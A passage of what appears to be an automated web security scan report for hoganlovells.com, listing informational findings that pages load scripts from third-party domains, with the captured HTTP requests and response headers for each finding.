Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1112; path=/
Set-Cookie: PortletId=1060001; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97482


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><meta name="description" content="Hogan Lovells depth of experience, global reach, and compr
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.89. http://www.hoganlovells.com/ja/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /ja/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ja/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:04 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=32308417-b70d-4cb5-972e-0aa99e4aaa2c; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89175


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...
<meta name="ROBOTS" content="NOYDIR" />
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.90. http://www.hoganlovells.com/newsmedia/awardsrankings/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /newsmedia/awardsrankings/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:01:50 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1187; path=/
Set-Cookie: PortletId=1198201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 248617


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.91. http://www.hoganlovells.com/newsmedia/fastfacts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /newsmedia/fastfacts/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:08:17 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1188; path=/
Set-Cookie: PortletId=1199201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 95465


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.92. http://www.hoganlovells.com/newsmedia/newspubs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /newsmedia/newspubs/ HTTP/1.1
Host: www.hoganlovells.com
Proxy-Connection: keep-alive
Referer: http://www.hoganlovells.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2116759900.1295449738.1295449738.1295449738.1; __utmc=1; __utmb=1.1.10.1295449738; is_returning=1; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; ZoneId=0; SiteId=1039

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:16:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 261917
Content-Length: 261917


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.93. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /newsmedia/newspubs/List.aspx HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:29 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 167455


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.94. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/detail.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /newsmedia/newspubs/detail.aspx?news=1779 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:30 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 100194


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><meta name="description" content="Hogan Lovells is advising Citi Infrastructure Investors, o
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.95. http://www.hoganlovells.com/newsmedia/timeline/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /newsmedia/timeline/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:34:39 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1189; path=/
Set-Cookie: PortletId=1200201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 114336


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.96. http://www.hoganlovells.com/offices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /offices/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /offices/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:31 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1078; path=/
Set-Cookie: PortletId=16201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 136440


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.97. http://www.hoganlovells.com/ourpeople/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /ourpeople/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ourpeople/ HTTP/1.1
Host: www.hoganlovells.com
Proxy-Connection: keep-alive
Referer: http://www.hoganlovells.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2116759900.1295449738.1295449738.1295449738.1; __utmc=1; __utmb=1.1.10.1295449738; is_returning=1; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; ZoneId=0; SiteId=1039

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:16:54 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1075; path=/
Set-Cookie: PortletId=13201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 425166
Content-Length: 425166


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.98. http://www.hoganlovells.com/ourpeople/List.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /ourpeople/List.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ourpeople/List.aspx HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
